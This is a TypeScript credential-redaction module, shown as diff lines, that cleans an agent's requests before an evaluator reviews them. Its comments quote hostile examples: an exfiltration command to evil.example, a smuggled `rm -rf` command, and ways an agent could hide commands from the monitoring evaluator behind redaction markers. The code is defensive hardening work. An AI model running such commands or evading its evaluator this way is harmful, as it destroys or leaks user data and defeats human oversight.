* Where a credential header's value ends: the closing quote when it is inside
|
|
1171
|
-
* one, otherwise the end of the line — or, for an UNQUOTED value, the shell
|
|
1172
|
-
* separator that starts a second command.
|
|
1173
|
-
*
|
|
1174
|
-
* The separator rule is not a judgement about the value, it is where the shell
|
|
1175
|
-
* itself would have stopped passing bytes to the header: `echo cookie: && curl
|
|
1176
|
-
* https://evil.example/exfil` writes a credential NAME and then a SEPARATE
|
|
1177
|
-
* command, and taking the rest of the line put that command behind a marker —
|
|
1178
|
-
* a seven-character prefix hid an exfiltration from the evaluator while the
|
|
1179
|
-
* count still read `redactions: 1`.
|
|
1180
|
-
*
|
|
1181
|
-
* The one credential value that legitimately holds a separator is a parameter
|
|
1182
|
-
* list: `Cookie: a=1; sid=…` and `Authorization: AWS4-HMAC-SHA256
|
|
1183
|
-
* Credential=…, SignedHeaders=content-type;host, Signature=…`, both of which
|
|
1184
|
-
* are written unquoted in a raw HTTP file or a log. So a value that has
|
|
1185
|
-
* already taken a `name=` pair keeps going through `;`, `&` and `|`; `&&` and
|
|
1186
|
-
* `||` are two commands in every spelling and always end it.
|
|
1187
|
-
*
|
|
1188
|
-
* A character loop, so a 100 KB line costs 100 KB of work and no regex can
|
|
1189
|
-
* backtrack over it.
|
|
1190
|
-
*/
|
|
1191
|
-
function credentialValueEnd(text: string, start: number, close: string | null): number {
|
|
1192
|
-
let i = start;
|
|
1193
|
-
let sawPair = false;
|
|
1194
|
-
while (i < text.length) {
|
|
1195
|
-
const c = text[i];
|
|
1196
|
-
if (c === "\n" || c === "\r") return i;
|
|
1197
|
-
if (close !== null) {
|
|
1198
|
-
if (text.startsWith(close, i) && quoteClosesValue(text, i, close)) return i;
|
|
1199
|
-
} else if (c === ";" || c === "&" || c === "|") {
|
|
1200
|
-
if (!sawPair || ((c === "&" || c === "|") && text[i + 1] === c)) return i;
|
|
1201
|
-
} else if (c === "=" && i > start) {
|
|
1202
|
-
sawPair = true;
|
|
1203
|
-
}
|
|
1204
|
-
if (c === "\\") {
|
|
1205
|
-
const n = text[i + 1];
|
|
1206
|
-
if (n === "n" || n === "r") return i;
|
|
1207
|
-
i += n === undefined ? 1 : 2;
|
|
1208
|
-
continue;
|
|
1209
|
-
}
|
|
1210
|
-
i++;
|
|
1211
|
-
}
|
|
1212
|
-
return text.length;
|
|
1213
|
-
}
|
|
1214
|
-
|
|
1215
|
-
/** A line break at `i`: a real one, or the JSON escape of one. 0 when there is none. */
|
|
1216
|
-
function lineBreakLength(text: string, i: number): number {
|
|
1217
|
-
const c = text[i];
|
|
1218
|
-
if (c === "\n") return 1;
|
|
1219
|
-
if (c === "\r") return text[i + 1] === "\n" ? 2 : 1;
|
|
1220
|
-
if (c === "\\" && (text[i + 1] === "n" || text[i + 1] === "r")) return 2;
|
|
1221
|
-
return 0;
|
|
1222
|
-
}
|
|
1223
|
-
|
|
1224
|
-
/** Where the line holding `pos` starts, real breaks and JSON-escaped ones alike. */
|
|
1225
|
-
function lineStartBefore(text: string, pos: number): number {
|
|
1226
|
-
for (let i = pos - 1; i >= 0; i--) {
|
|
1227
|
-
const c = text[i];
|
|
1228
|
-
if (c === "\n" || c === "\r") return i + 1;
|
|
1229
|
-
if ((c === "n" || c === "r") && i > 0 && text[i - 1] === "\\") return i + 1;
|
|
1230
|
-
}
|
|
1231
|
-
return 0;
|
|
1232
|
-
}
|
|
1233
|
-
|
|
1234
|
-
/** Where the line holding `at` ends. */
|
|
1235
|
-
function lineEnd(text: string, at: number): number {
|
|
1236
|
-
let i = at;
|
|
1237
|
-
while (i < text.length && lineBreakLength(text, i) === 0) i++;
|
|
1238
|
-
return i;
|
|
1239
|
-
}
|
|
1240
|
-
|
|
1241
|
-
/** How many spaces or tabs `at` opens with. */
|
|
1242
|
-
function indentAt(text: string, at: number): number {
|
|
1243
|
-
let n = 0;
|
|
1244
|
-
while (text[at + n] === " " || text[at + n] === "\t") n++;
|
|
1245
|
-
return n;
|
|
1246
|
-
}
|
|
1247
|
-
|
|
1248
|
-
/**
|
|
1249
|
-
* A YAML block or folded scalar indicator (`|`, `>-`, `|+2`) that is the whole
|
|
1250
|
-
* rest of the line: the value is the block indented underneath it. Read in
|
|
1251
|
-
* code and in one bounded step, because an indicator is at most four
|
|
1252
|
-
* characters and slicing the rest of the line per header is not linear.
|
|
1253
|
-
* Returns where the indicator's line ends, or -1.
|
|
1254
|
-
*/
|
|
1255
|
-
function blockIndicatorEnd(text: string, at: number): number {
|
|
1256
|
-
const c = text[at];
|
|
1257
|
-
if (c !== "|" && c !== ">") return -1;
|
|
1258
|
-
let i = at + 1;
|
|
1259
|
-
if (text[i] === "+" || text[i] === "-") i++;
|
|
1260
|
-
while (text[i] >= "0" && text[i] <= "9") i++;
|
|
1261
|
-
while (text[i] === " " || text[i] === "\t") i++;
|
|
1262
|
-
return i >= text.length || lineBreakLength(text, i) > 0 ? i : -1;
|
|
1263
|
-
}
|
|
1264
|
-
|
|
1265
|
-
/**
|
|
1266
|
-
* Whether only indentation — and the opening quote of a JSON key — precedes
|
|
1267
|
-
* `at` on its line.
|
|
1268
|
-
*
|
|
1269
|
-
* This is what keeps the continuation rule on the formats that have one. A
|
|
1270
|
-
* header NAME written on its own line is YAML, a folded HTTP header or a
|
|
1271
|
-
* line-broken dict, and the credential really is the block underneath. A name
|
|
1272
|
-
* with a COMMAND in front of it (`echo authorization:`, `grep -rn cookie:`) is
|
|
1273
|
-
* none of those, and taking the lines beneath it hid whatever the agent had
|
|
1274
|
-
* written there behind one marker that read as handled.
|
|
1275
|
-
*/
|
|
1276
|
-
function startsItsLine(text: string, at: number): boolean {
|
|
1277
|
-
for (let i = lineStartBefore(text, at); i < at; i++) {
|
|
1278
|
-
const c = text[i];
|
|
1279
|
-
if (c !== " " && c !== "\t" && c !== '"' && c !== "'" && c !== "\\" && c !== "-") return false;
|
|
1280
|
-
}
|
|
1281
|
-
return true;
|
|
1282
|
-
}
|
|
1283
|
-
|
|
1284
|
-
/**
|
|
1285
|
-
* How many lines a block scalar's value may run for. A credential wrapped over
|
|
1286
|
-
* more lines than this is not a credential, and a value that ends only where
|
|
1287
|
-
* the indentation does is a way to hide a page of injected text behind one
|
|
1288
|
-
* marker.
|
|
1289
|
-
*/
|
|
1290
|
-
const MAX_CONTINUATION_LINES = 32;
|
|
1291
|
-
|
|
1292
|
-
/**
|
|
1293
|
-
* The value of a header whose own line holds nothing but the name — a folded
|
|
1294
|
-
* HTTP header, a line-broken JSON object, and above all a YAML block scalar
|
|
1295
|
-
* (`authorization: >-`), the one format where a credential legitimately sits on
|
|
1296
|
-
* its own line. Redacting the indicator and leaving the credential underneath
|
|
1297
|
-
* it was worse than not matching at all: the count read as handled.
|
|
1298
|
-
*
|
|
1299
|
-
* Bounded three ways, because a marker that swallows an unbounded block hides
|
|
1300
|
-
* an injected command from the evaluator just as effectively as it hides a
|
|
1301
|
-
* credential from Jev:
|
|
1302
|
-
*
|
|
1303
|
-
* - the name must START its line (`startsItsLine`), so `echo authorization:`
|
|
1304
|
-
* takes nothing;
|
|
1305
|
-
* - without an explicit block indicator the value is ONE line, the folded
|
|
1306
|
-
* header and the line-broken dict;
|
|
1307
|
-
* - with one (`authorization: |`) it is the more-indented block, and never
|
|
1308
|
-
* more than `MAX_CONTINUATION_LINES` of it.
|
|
1309
|
-
*
|
|
1310
|
-
* A first line that opens with a quote ends at that quote instead, so
|
|
1311
|
-
* `{"Authorization":\n "…"}` keeps its quotes.
|
|
1312
|
-
*
|
|
1313
|
-
* Reached only when the rest of the header's line is blank or a block
|
|
1314
|
-
* indicator, which at most one header per line can be, so the walk back to the
|
|
1315
|
-
* line start costs one pass over that line and the scan stays linear.
|
|
1316
|
-
*/
|
|
1317
|
-
function continuationValue(text: string, nameAt: number, from: number, block: boolean): { start: number; end: number } | null {
|
|
1318
|
-
// Cheap test first: only a value that runs to a line break can continue on
|
|
1319
|
-
// the next one, and at most one header per line does, so the walk back to
|
|
1320
|
-
// the line start below costs one pass over that line and no more.
|
|
1321
|
-
if (lineBreakLength(text, from) === 0) return null;
|
|
1322
|
-
if (!startsItsLine(text, nameAt)) return null;
|
|
1323
|
-
const indent = indentAt(text, lineStartBefore(text, nameAt));
|
|
1324
|
-
let start = -1;
|
|
1325
|
-
let end = -1;
|
|
1326
|
-
let taken = 0;
|
|
1327
|
-
let i = from;
|
|
1328
|
-
for (;;) {
|
|
1329
|
-
const b = lineBreakLength(text, i);
|
|
1330
|
-
if (b === 0) break;
|
|
1331
|
-
const lineAt = i + b;
|
|
1332
|
-
const ind = indentAt(text, lineAt);
|
|
1333
|
-
const contentAt = lineAt + ind;
|
|
1334
|
-
if (contentAt >= text.length || ind <= indent || lineBreakLength(text, contentAt) > 0) break;
|
|
1335
|
-
if (start < 0) {
|
|
1336
|
-
// A quoted first line is the whole value: `"HMAC …"` on its own line.
|
|
1337
|
-
const close = escapedQuoteRun(text, contentAt);
|
|
1338
|
-
if (close !== null) {
|
|
1339
|
-
const inner = contentAt + close.length;
|
|
1340
|
-
return { start: inner, end: credentialValueEnd(text, inner, close) };
|
|
1341
|
-
}
|
|
1342
|
-
start = contentAt;
|
|
1343
|
-
}
|
|
1344
|
-
i = lineEnd(text, contentAt);
|
|
1345
|
-
end = i;
|
|
1346
|
-
if (++taken >= (block ? MAX_CONTINUATION_LINES : 1)) break;
|
|
1347
|
-
}
|
|
1348
|
-
return start < 0 || end <= start ? null : { start, end };
|
|
1349
|
-
}
|
|
1350
|
-
|
|
1351
|
-
/**
|
|
1352
|
-
* A character no credential's own text carries, so a piece holding one is not
|
|
1353
|
-
* one and may not reach the scrub list. Each exclusion is a delete key that
|
|
1354
|
-
* was reported and deleted attacker-chosen text envelope-wide: a `/` is a path
|
|
1355
|
-
* or a URL, a bracket or a backtick or a `$` is code or a reference, a `<` is
|
|
1356
|
-
* one of this file's own markers, a `:` is a timestamp or a scheme or a port,
|
|
1357
|
-
* a quote or a comma is punctuation of the text around the value, and
|
|
1358
|
-
* whitespace is a phrase.
|
|
1359
|
-
*
|
|
1360
|
-
* Everything else stays in: a password is allowed to hold `!`, `#`, `%`, `+`
|
|
1361
|
-
* and the rest, and the ones that are ALSO written in real credentials
|
|
1362
|
-
* (`+`, `=`, `.`, `_`, `-`) carry base64, JWTs and hex.
|
|
1363
|
-
*/
|
|
1364
|
-
const NOT_CREDENTIAL_CHARS_RE = /[\s/\\<>(){}[\]`$"',;:|&]/;
|
|
1365
|
-
/** A piece OPENING with one of these is a reference, a flag or a path. */
|
|
1366
|
-
const NOT_CREDENTIAL_START_RE = /^[-~%@#^*?!+=.]/;
|
|
1367
|
-
/** `session.user.id`, `config.apiKey`: an expression, not a token. A JWT's
|
|
1368
|
-
* segments are far longer than an identifier's, so it is not one of these. */
|
|
1369
|
-
const DOTTED_IDENTIFIER_RE = /^[A-Za-z_$][A-Za-z0-9_$]{0,11}(?:\.[A-Za-z_$][A-Za-z0-9_$]{0,11})+$/;
|
|
1370
|
-
|
|
1371
|
-
/**
|
|
1372
|
-
* `piece` as a COPY of the credential just redacted, or null.
|
|
1373
|
-
*
|
|
1374
|
-
* This is the ONE question this file asks about a credential's content, and it
|
|
1375
|
-
* decides the SCRUB LIST, never the redaction: the value is replaced on the
|
|
1376
|
-
* strength of its NAME whatever this returns.
|
|
1377
|
-
*
|
|
1378
|
-
* It has to be asked, because `scrubKnownSecrets` deletes what it is given from
|
|
1379
|
-
* every other string in the envelope — from `facts`, which the prompt tells Jev
|
|
1380
|
-
* are "correct", and from the human's own words. The blunt rules above redact
|
|
1381
|
-
* whatever an agent writes under a credential name, so a path, a second command
|
|
1382
|
-
* or an English sentence lands here just as readily as a token, and reporting
|
|
1383
|
-
* those made the scrub list an attacker-writable delete key: `echo cookie: ;
|
|
1384
|
-
* rm -rf /home/u/build` reported `rm`, `-rf` and the path, and the path then
|
|
1385
|
-
* vanished from `facts.paths` and from `user_said`.
|
|
1386
|
-
*
|
|
1387
|
-
* So only an opaque token qualifies: eight characters or more, holding none of
|
|
1388
|
-
* the characters that say "path, expression, marker or phrase" and opening
|
|
1389
|
-
* with none of them either, not a dotted identifier, not mostly digits and
|
|
1390
|
-
* separators, and a shape a word does not have. A credential that
|
|
1391
|
-
* fails the test is still redacted where it was written; only the scrub of its
|
|
1392
|
-
* copies elsewhere is given up, and a copy that reaches Jev anyway is one with
|
|
1393
|
-
* no credential context around it. When in doubt this returns null: an unfixed
|
|
1394
|
-
* copy is one string in the request, a wrong entry deletes the evaluator's
|
|
1395
|
-
* context wherever the attacker chose to point it.
|
|
1396
|
-
*/
|
|
1397
|
-
function credentialCopy(piece: string): { value: string; weak: boolean } | null {
|
|
1398
|
-
const s = bareArgument(piece);
|
|
1399
|
-
if (s.length < 8 || NOT_CREDENTIAL_CHARS_RE.test(s) || NOT_CREDENTIAL_START_RE.test(s)) return null;
|
|
1400
|
-
if (DOTTED_IDENTIFIER_RE.test(s)) return null;
|
|
1401
|
-
// A date, a version, a numeric id: a credential has letters in it.
|
|
1402
|
-
if (s.replace(/[^A-Za-z]/g, "").length * 4 < s.length) return null;
|
|
1403
|
-
if (!tokenLike(s)) return null;
|
|
1404
|
-
return { value: s, weak: wordBuiltToken(s) };
|
|
1405
|
-
}
|
|
1406
|
-
|
|
1407
|
-
/** Whether `s[from, to)` reads as a word rather than as random text. */
|
|
1408
|
-
function wordSegment(s: string, from: number, to: number): boolean {
|
|
1409
|
-
const n = to - from;
|
|
1410
|
-
if (n < 3 || n > 12) return false;
|
|
1411
|
-
for (let i = from; i < to; i++) {
|
|
1412
|
-
const c = s[i];
|
|
1413
|
-
if (!((c >= "a" && c <= "z") || (c >= "A" && c <= "Z"))) return false;
|
|
1414
|
-
}
|
|
1415
|
-
return true;
|
|
1416
|
-
}
|
|
1417
|
-
|
|
1418
|
-
/**
|
|
1419
|
-
* Whether a credential copy is BUILT FROM WORDS: `api-v2-backup`,
|
|
1420
|
-
* `dark-mode-v2`, `dev-admin-key-9f3c`.
|
|
1421
|
-
*
|
|
1422
|
-
* These are the two shapes at once — a real corpus credential is written this
|
|
1423
|
-
* way, and so is every directory, branch and CSS class a human ever named —
|
|
1424
|
-
* and nothing in the text can tell them apart, because the rule that redacted
|
|
1425
|
-
* it only read the NAME in front of it. So they are reported WEAKLY: scrubbed
|
|
1426
|
-
* out of the agent's own request, left alone in the human's words and in the
|
|
1427
|
-
* facts, where deleting the wrong word blinds the evaluator on text the agent
|
|
1428
|
-
* chose.
|
|
1429
|
-
*
|
|
1430
|
-
* A segment of eight characters or more that is NOT a word makes the whole
|
|
1431
|
-
* token opaque again (`my-service-token-9f3c2b1a`), because no name is spelled
|
|
1432
|
-
* that way and the cost of missing that copy is a live credential.
|
|
1433
|
-
*
|
|
1434
|
-
* A character walk over segments, so no input backtracks it.
|
|
1435
|
-
*/
|
|
1436
|
-
function wordBuiltToken(s: string): boolean {
|
|
1437
|
-
let segments = 0;
|
|
1438
|
-
let words = 0;
|
|
1439
|
-
let from = 0;
|
|
1440
|
-
for (let i = 0; i <= s.length; i++) {
|
|
1441
|
-
const c = s[i];
|
|
1442
|
-
if (c !== undefined && c !== "-" && c !== "_" && c !== ".") continue;
|
|
1443
|
-
const isWord = wordSegment(s, from, i);
|
|
1444
|
-
if (!isWord && i - from >= 8) return false;
|
|
1445
|
-
if (isWord) words++;
|
|
1446
|
-
segments++;
|
|
1447
|
-
from = i + 1;
|
|
1448
|
-
}
|
|
1449
|
-
return segments > 1 && words > 0;
|
|
1450
|
-
}
|
|
1451
|
-
|
|
1452
|
-
/**
|
|
1453
|
-
* Whether `piece` is SHAPED like a public authentication scheme rather than
|
|
1454
|
-
* like a credential — `Bearer`, `Basic`, `NTLM`, `Hawk`, `Negotiate`,
|
|
1455
|
-
* `GoogleLogin`, `AWS4-HMAC-SHA256`.
|
|
1456
|
-
*
|
|
1457
|
-
* Asked instead of a scheme ALLOWLIST, which the directive rules out and which
|
|
1458
|
-
* three earlier rounds each proved leaky: an unknown scheme is redacted like
|
|
1459
|
-
* any other value, this only decides whether the first piece goes on the scrub
|
|
1460
|
-
* list. Dropping position 0 unconditionally was the other extreme and cost a
|
|
1461
|
-
* live credential: `Authorization: <bare key>` is the form many APIs take, and
|
|
1462
|
-
* its only piece IS the secret, so nothing was reported and the copy the human
|
|
1463
|
-
* had pasted went to Jev verbatim.
|
|
1464
|
-
*
|
|
1465
|
-
* A scheme word is short, and its `-`/`_` segments are words or acronyms with
|
|
1466
|
-
* their digits at the END (`AWS4`, `SHA256`). A credential interleaves its
|
|
1467
|
-
* classes (`aB3xY9zQ…`) or runs longer than any word does.
|
|
1468
|
-
*/
|
|
1469
|
-
function schemeShaped(piece: string): boolean {
|
|
1470
|
-
if (piece.length === 0 || piece.length > 24) return false;
|
|
1471
|
-
let letters = 0;
|
|
1472
|
-
let sawDigit = false;
|
|
1473
|
-
for (let i = 0; i <= piece.length; i++) {
|
|
1474
|
-
const c = piece[i];
|
|
1475
|
-
if (c === undefined || c === "-" || c === "_") {
|
|
1476
|
-
if (letters === 0 || letters > 12) return false;
|
|
1477
|
-
letters = 0;
|
|
1478
|
-
sawDigit = false;
|
|
1479
|
-
continue;
|
|
1480
|
-
}
|
|
1481
|
-
if (c >= "0" && c <= "9") {
|
|
1482
|
-
sawDigit = true;
|
|
1483
|
-
continue;
|
|
1484
|
-
}
|
|
1485
|
-
if ((c >= "a" && c <= "z") || (c >= "A" && c <= "Z")) {
|
|
1486
|
-
// A digit in FRONT of a letter is not how a word or an acronym is spelled.
|
|
1487
|
-
if (sawDigit) return false;
|
|
1488
|
-
letters++;
|
|
1489
|
-
continue;
|
|
1490
|
-
}
|
|
1491
|
-
return false;
|
|
1492
|
-
}
|
|
1493
|
-
return true;
|
|
1494
|
-
}
|
|
1495
|
-
|
|
1496
|
-
/**
|
|
1497
|
-
* What of a redacted header value to hand `scrubKnownSecrets`, which replaces
|
|
1498
|
-
* every copy of it in the REST of the envelope.
|
|
1499
|
-
*
|
|
1500
|
-
* Only text that was actually redacted as a credential may go on that list, so
|
|
1501
|
-
* every piece goes through `credentialCopy`, and two structural exclusions come
|
|
1502
|
-
* first:
|
|
1503
|
-
*
|
|
1504
|
-
* - a region holding a marker reports nothing. Whatever was secret in it was
|
|
1505
|
-
* already found and reported by the earlier rule that wrote the marker, and
|
|
1506
|
-
* splitting the rest on whitespace produced fragments of the MARKER —
|
|
1507
|
-
* `<redacted:OpenAI` is sixteen characters, so `scrubKnownSecrets` accepted
|
|
1508
|
-
* it and mangled every other marker in the envelope.
|
|
1509
|
-
* - where the header HAS a scheme position, the first piece is dropped, alone
|
|
1510
|
-
* on the value or not: `Bearer`, `AWS4-HMAC-SHA256`, `Hawk`, `NTLM` are
|
|
1511
|
-
* public, and `AWS4-HMAC-SHA256` is exactly sixteen characters, so reporting
|
|
1512
|
-
* it deleted the human's own words from `user_said`. Requiring a SECOND
|
|
1513
|
-
* piece before dropping the first left that exact string on the list for a
|
|
1514
|
-
* value that is only a scheme word. A piece with an `=` in it is never a
|
|
1515
|
-
* scheme, and `Cookie`/`x-api-key` have no scheme position at all — their
|
|
1516
|
-
* credential IS the first piece (`sid=…`), which round 6 dropped while
|
|
1517
|
-
* scrubbing the public `theme=dark` next to it envelope-wide.
|
|
1518
|
-
*
|
|
1519
|
-
* A `name=value` piece reports its VALUE rather than the pair: the value is the
|
|
1520
|
-
* credential, and a copy written as `sid=<value>` loses it too, because the
|
|
1521
|
-
* scrub replaces substrings. That is what keeps `theme=dark` off the list. An
|
|
1522
|
-
* `=` with nothing but more `=` behind it is base64 PADDING, not a separator —
|
|
1523
|
-
* reading `dXNlcjpwYXNz==` as a pair reported its one-character tail, which
|
|
1524
|
-
* fails the floor, so a `Basic` credential's copies went out in clear.
|
|
1525
|
-
*/
|
|
1526
|
-
function credentialCopies(region: string, hasScheme: boolean): CredentialCopies {
|
|
1527
|
-
const out: CredentialCopies = { secrets: [], weak: [] };
|
|
1528
|
-
if (region.includes(AUTH_MARKER_HEAD)) return out;
|
|
1529
|
-
const pieces = region.split(/\s+/).filter(Boolean);
|
|
1530
|
-
for (let i = 0; i < pieces.length; i++) {
|
|
1531
|
-
const piece = bareArgument(pieces[i]);
|
|
1532
|
-
if (i === 0 && hasScheme && !piece.includes("=") && schemeShaped(piece)) continue;
|
|
1533
|
-
const eq = piece.indexOf("=");
|
|
1534
|
-
const tail = eq > 0 ? piece.slice(eq + 1) : "";
|
|
1535
|
-
const copy = credentialCopy(eq > 0 && !/^=*$/.test(tail) ? tail : piece);
|
|
1536
|
-
if (copy === null) continue;
|
|
1537
|
-
const list = copy.weak ? out.weak : out.secrets;
|
|
1538
|
-
if (!list.includes(copy.value)) list.push(copy.value);
|
|
1539
|
-
}
|
|
1540
|
-
return out;
|
|
1541
|
-
}
|
|
1542
|
-
|
|
1543
|
-
/** What a credential region reports: scrubbed everywhere, or only in the request. */
|
|
1544
|
-
interface CredentialCopies {
|
|
1545
|
-
secrets: string[];
|
|
1546
|
-
weak: string[];
|
|
1547
|
-
}
|
|
1548
|
-
|
|
1549
|
-
/** Add one region's copies to a running counter. */
|
|
1550
|
-
function addCopies(counter: { found: string[]; weak: string[] }, copies: CredentialCopies): void {
|
|
1551
|
-
for (const s of copies.secrets) counter.found.push(s);
|
|
1552
|
-
for (const s of copies.weak) counter.weak.push(s);
|
|
1553
|
-
}
|
|
1554
|
-
|
|
1555
|
-
/** Every credential header's value in `text`, as one marker each. */
|
|
1556
|
-
function redactCredentialHeaders(text: string, counter: Counter): string {
|
|
1557
|
-
let out = "";
|
|
1558
|
-
let last = 0;
|
|
1559
|
-
const cur: QuoteCursor = { pos: 0, open: null };
|
|
1560
|
-
CREDENTIAL_HEADER_RE.lastIndex = 0;
|
|
1561
|
-
for (let m = CREDENTIAL_HEADER_RE.exec(text); m !== null; m = CREDENTIAL_HEADER_RE.exec(text)) {
|
|
1562
|
-
const valueAt = m.index + m[0].length;
|
|
1563
|
-
if (cur.pos < valueAt) advanceQuotes(text, cur, valueAt);
|
|
1564
|
-
let close = cur.open;
|
|
1565
|
-
let start = valueAt;
|
|
1566
|
-
if (close === null) {
|
|
1567
|
-
// The value opens a quote of its own: `{"Authorization": "Bearer …"}`,
|
|
1568
|
-
// and `{\"Authorization\": \"Bearer …\"}` at any JSON nesting depth.
|
|
1569
|
-
const own = escapedQuoteRun(text, valueAt);
|
|
1570
|
-
if (own !== null) {
|
|
1571
|
-
close = own;
|
|
1572
|
-
start = valueAt + own.length;
|
|
1573
|
-
}
|
|
1574
|
-
}
|
|
1575
|
-
let end = credentialValueEnd(text, start, close);
|
|
1576
|
-
let region = text.slice(start, end);
|
|
1577
|
-
// Nothing on this line but the name, or a YAML block indicator: the value
|
|
1578
|
-
// is the block indented underneath.
|
|
1579
|
-
// A block indicator is one wherever it is written: `blockIndicatorEnd`
|
|
1580
|
-
// already requires it to END the line, so a `|` inside a quoted value
|
|
1581
|
-
// (`-H "Authorization: |"`) is not one, and a YAML document nested inside
|
|
1582
|
-
// a JSON string — where the enclosing quote is open — still is.
|
|
1583
|
-
const indicator = blockIndicatorEnd(text, start);
|
|
1584
|
-
if (indicator >= 0 || withoutMarkers(region).trim() === "") {
|
|
1585
|
-
const cont = continuationValue(text, m.index + m[1].length, indicator >= 0 ? indicator : end, indicator >= 0);
|
|
1586
|
-
if (cont === null) continue;
|
|
1587
|
-
start = cont.start;
|
|
1588
|
-
end = cont.end;
|
|
1589
|
-
region = text.slice(start, end);
|
|
1590
|
-
}
|
|
1591
|
-
// Nothing left to take: an empty value, or one an earlier rule already
|
|
1592
|
-
// replaced whole — which is what makes a second pass a no-op.
|
|
1593
|
-
if (withoutMarkers(region).trim() === "") continue;
|
|
1594
|
-
out += text.slice(last, start) + marker(credentialHeaderLabel(m[2]));
|
|
1595
|
-
counter.n++;
|
|
1596
|
-
addCopies(counter, credentialCopies(region, headerHasScheme(m[2])));
|
|
1597
|
-
last = end;
|
|
1598
|
-
CREDENTIAL_HEADER_RE.lastIndex = end;
|
|
1599
|
-
}
|
|
1600
|
-
CREDENTIAL_HEADER_RE.lastIndex = 0;
|
|
1601
|
-
return last === 0 ? text : out + text.slice(last);
|
|
1602
|
-
}
|
|
1603
|
-
|
|
1604
|
-
/**
|
|
1605
|
-
* A Bearer credential with no `Authorization` in front of it — `"Bearer …"` as a
|
|
1606
|
-
* value in a script or a config. Must look like a token, because "bearer" is also
|
|
1607
|
-
* an English word ("the bearer authentication scheme").
|
|
1608
|
-
*/
|
|
1609
|
-
const BEARER_RE = /\b(bearer[ \t]+)([A-Za-z0-9\-._~+/=]{8,})/gi;
|
|
1610
|
-
|
|
1611
|
-
/**
|
|
1612
|
-
* Credential arguments on the command line.
|
|
1613
|
-
*
|
|
1614
|
-
* The same blunt rule as the credential headers, for the same reason: the FLAG
|
|
1615
|
-
* decides, never the value. `--password swordfish` is a password although
|
|
1616
|
-
* nothing about `swordfish` says so, and `-p -aB3xY…`, `--api-key '$ecret'`
|
|
1617
|
-
* and `--token <paste-it-here>` are credentials whose first character used to
|
|
1618
|
-
* disqualify them. So the WHOLE argument goes — quoted or bare, attached
|
|
1619
|
-
* (`-p'pw'`) or separate, reference-shaped or not.
|
|
1620
|
-
*
|
|
1621
|
-
* Deliberately blunter than before: `use --token to authenticate` and
|
|
1622
|
-
* `failproofai config --token <token>` now lose their next word to a marker.
|
|
1623
|
-
*
|
|
1624
|
-
* The flag list is fixed rather than name-derived, because the list is the
|
|
1625
|
-
* whole false-positive guard. A long flag that names a credential is one
|
|
1626
|
-
* wherever it appears; a SHORT one is ambiguous (`-p` is `--parents` to
|
|
1627
|
-
* `mkdir` and a port map to `docker run`), so it counts only behind a command
|
|
1628
|
-
* that takes a credential that way, found in a bounded window that never
|
|
1629
|
-
* crosses a command separator. Short flags are matched case-SENSITIVELY:
|
|
1630
|
-
* mysql's `-P` is the port and its `-p` is the password. Other secret-named
|
|
1631
|
-
* flags (`--dsn`, `--pat`) stay with `FLAG_NAME_RE`, which still asks what
|
|
1632
|
-
* the value looks like.
|
|
1633
|
-
*/
|
|
1634
|
-
const CREDENTIAL_FLAGS: ReadonlySet<string> = new Set([
|
|
1635
|
-
"--password",
|
|
1636
|
-
"--passwd",
|
|
1637
|
-
"--passphrase",
|
|
1638
|
-
"--pwd",
|
|
1639
|
-
"--token",
|
|
1640
|
-
"--api-token",
|
|
1641
|
-
"--auth-token",
|
|
1642
|
-
"--access-token",
|
|
1643
|
-
"--refresh-token",
|
|
1644
|
-
"--session-token",
|
|
1645
|
-
"--private-token",
|
|
1646
|
-
"--personal-access-token",
|
|
1647
|
-
"--secret",
|
|
1648
|
-
"--client-secret",
|
|
1649
|
-
"--api-key",
|
|
1650
|
-
"--apikey",
|
|
1651
|
-
"--admin-password",
|
|
1652
|
-
"--db-password",
|
|
1653
|
-
"--registry-password",
|
|
1654
|
-
"--credential",
|
|
1655
|
-
"--credentials",
|
|
1656
|
-
]);
|
|
1657
|
-
|
|
1658
|
-
/** A short or ambiguous flag, and the command that makes it a credential. */
|
|
1659
|
-
interface GatedFlag {
|
|
1660
|
-
flag: string;
|
|
1661
|
-
commands: ReadonlyArray<string>;
|
|
1662
|
-
/** A second word that must be in the window too (`docker … login -p`). */
|
|
1663
|
-
also?: string;
|
|
1664
|
-
/** mysql's `-p` takes its password GLUED; a bare `-p` prompts, and the word
|
|
1665
|
-
* after it is the database. */
|
|
1666
|
-
attachedOnly?: boolean;
|
|
1667
|
-
}
|
|
1668
|
-
const GATED_CREDENTIAL_FLAGS: ReadonlyArray<GatedFlag> = [
|
|
1669
|
-
{ flag: "-p", commands: ["mysql", "mysqldump", "mysqladmin", "mariadb", "mariadb-dump"], attachedOnly: true },
|
|
1670
|
-
{ flag: "-p", commands: ["sshpass"] },
|
|
1671
|
-
{ flag: "-p", commands: ["docker", "podman", "helm", "oras", "skopeo", "buildah", "nerdctl"], also: "login" },
|
|
1672
|
-
{ flag: "-a", commands: ["redis-cli"] },
|
|
1673
|
-
{ flag: "-b", commands: ["gh"], also: "secret" },
|
|
1674
|
-
{ flag: "--body", commands: ["gh"], also: "secret" },
|
|
1675
|
-
];
|
|
1676
|
-
/** `curl -u user:pass`: the user is kept, everything after the `:` is not. */
|
|
1677
|
-
const BASIC_AUTH_FLAGS: ReadonlySet<string> = new Set(["-u", "--user", "--proxy-user"]);
|
|
1678
|
-
const BASIC_AUTH_COMMANDS: ReadonlyArray<string> = ["curl", "wget", "http", "xh", "httpie"];
|
|
1679
|
-
/**
|
|
1680
|
-
* How far back a gated flag looks for its command. Bounded, so the scan stays
|
|
1681
|
-
* linear however many flags a line holds; a command and its credential flag
|
|
1682
|
-
* sit next to each other in every real spelling.
|
|
1683
|
-
*/
|
|
1684
|
-
const COMMAND_LOOKBACK = 120;
|
|
1685
|
-
|
|
1686
|
-
/** A flag, wherever one starts. The boundary group is what keeps this linear. */
|
|
1687
|
-
const FLAG_TOKEN_RE = /(^|\\[nrt]|[^A-Za-z0-9_-])(--?[A-Za-z][A-Za-z0-9_-]*)/g;
|
|
1688
|
-
const WORD_BEFORE_RE = /[A-Za-z0-9_-]/;
|
|
1689
|
-
const WORD_AFTER_RE = /[A-Za-z0-9_]/;
|
|
1690
|
-
|
|
1691
|
-
/** Whether `word` appears in `window` as a whole word. */
|
|
1692
|
-
function hasCommandWord(window: string, word: string): boolean {
|
|
1693
|
-
for (let i = window.indexOf(word); i >= 0; i = window.indexOf(word, i + 1)) {
|
|
1694
|
-
const before = i === 0 ? "" : window[i - 1];
|
|
1695
|
-
const after = window[i + word.length] ?? "";
|
|
1696
|
-
if (!WORD_BEFORE_RE.test(before) && !WORD_AFTER_RE.test(after)) return true;
|
|
1697
|
-
}
|
|
1698
